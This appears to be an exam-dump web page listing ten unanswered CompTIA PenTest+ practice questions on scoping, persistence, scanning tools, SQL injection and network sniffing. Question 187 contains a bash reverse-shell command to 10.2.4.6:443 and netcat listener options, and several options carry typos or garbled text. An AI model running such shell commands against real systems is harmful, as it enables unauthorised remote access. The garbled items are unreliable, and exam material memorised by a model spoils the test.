PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 181:

    Which of the following has a direct and significant impact on the budget of the security assessment?

    A. Scoping
    B. Scheduling
    C. Compliance requirement
    D. Target risk

  • Question 182:

    During a penetration test a tester Identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

    A. Shell binary placed in C \windowsttemp
    B. Modified daemons
    C. New user creation
    D. Backdoored executaWes

  • Question 183:

    Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

    A. Mimikatz
    B. BeEF
    C. Nikto
    D. Patator

  • Question 184:

    A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against device?

    A. Launch an SNMP password brute force attack against the device.
    B. Lunch a Nessus vulnerability scan against the device.
    C. Launch a DNS cache poisoning attack against the device.
    D. Launch an SMB exploit against the device.

  • Question 185:

    A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

    A. Stored XSS
    B. Fill path disclosure
    C. Expired certificate
    D. Clickjacking

  • Question 186:

    A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?

    A. a=1 or 1 
    B. 1=1 or b 
    C. 1=1 or 2 
    D. 1=1 or a 

  • Question 187:

    A tester intends to run the following command on a target system:

    bash -i >and /dev/tcp/10.2.4.6/443 0> and1

    Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

    A. nc -nvlp 443
    B. nc 10.2.4.6 443
    C. nc -w3 10.2.4.6 443
    D. nc-/bin/ah 10.2.4.6 443

  • Question 188:

    A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

    A. To allow another security consultant access to the shell
    B. To allow the developer to troubleshoot the vulnerability
    C. To allow the systems administrator to perform the cleanup
    D. To allow the systems administrator to write a rule on the WAF

  • Question 189:

    At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

    A. Enumeration of services
    B. OSINT gathering
    C. Port scanning
    D. Social engineering

  • Question 190:

    A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?

    A. Run a network vulnerability scan.
    B. Run a stress test.
    C. Run an MITM attack.
    D. Run a port scan.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.